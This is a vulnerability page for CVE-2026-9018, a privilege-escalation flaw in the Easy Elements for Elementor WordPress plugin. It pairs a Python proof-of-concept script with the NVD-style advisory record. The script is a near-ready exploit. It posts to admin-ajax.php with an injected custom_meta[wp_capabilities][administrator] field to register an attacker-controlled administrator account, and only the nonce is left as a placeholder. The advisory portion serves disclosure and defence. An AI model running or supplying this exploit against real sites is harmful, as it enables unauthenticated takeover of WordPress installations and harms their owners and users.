CVE-2026-9018

import requests # Configuration target_url = "http://example.com" username = "attacker" password = "P@ssw0rd!" email = "[email protected]" # 1. Get the nonce from the page containing the Login/Register widget # The nonce is usually exposed in the DOM with ID or class related to the plugin print("[+] Fetching nonce...") session = requests.Session() index_page = session.get(target_url) # Note: In a real scenario, parse the HTML to find 'easy_elements_nonce' # Example: nonce = re.search(r'data-nonce="(.*?)"', index_page.text).group(1) # For this PoC, we assume we extracted it. nonce = "EXTRACTED_NONCE_VALUE" # 2. Exploit the Privilege Escalation ajax_url = f"{target_url}/wp-admin/admin-ajax.php" payload = { "action": "eel_register", "easy_elements_nonce": nonce, "username": username, "email": email, "pass": password, # This is the vulnerable part: injecting wp_capabilities "custom_meta[wp_capabilities][administrator]": "1" } print(f"[+] Sending payload to {ajax_url}...") response = session.post(ajax_url, data=payload) if response.status_code == 200: print("[+] Registration request sent.") print(f"[+] Try logging in at {target_url}/wp-admin with user: {username}") else: print("[-] Request failed.")

{"cve": {"id": "CVE-2026-9018", "sourceIdentifier": "[email protected]", "published": "2026-05-22T05:16:28.067", "lastModified": "2026-05-22T05:16:28.067", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.4.5 via the `easyel_handle_register()` function. This is due to the `wp_ajax_nopriv_eel_register` AJAX handler iterating the attacker-controlled `custom_meta` POST array and writing every supplied key-value pair to the newly created user's meta via `update_user_meta()` without any key whitelist or blocklist, allowing the `wp_capabilities` user meta key to be overwritten after `wp_insert_user()` has already assigned a safe role. This makes it possible for unauthenticated attackers to register a new account with full administrator-level privileges by supplying `custom_meta[wp_capabilities][administrator]=1`. Exploitation requires that user registration is enabled on the site and that at least one page exposes the Login/Register widget, which publishes the required `easy_elements_nonce` into the page DOM where it can be retrieved by any unauthenticated visitor via a simple GET request."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.5/includes/Utils/Enqueue.php#L200", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.5/widgets/login-register/class.login-register.php#L128", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.5/widgets/login-register/class.login-register.php#L65", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.5/widgets/login-register/class.login-register.php#L9", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f1de4899-532a-4558-bff0-f4610bfdd49d?source=cve", "source": "[email protected]"}]}}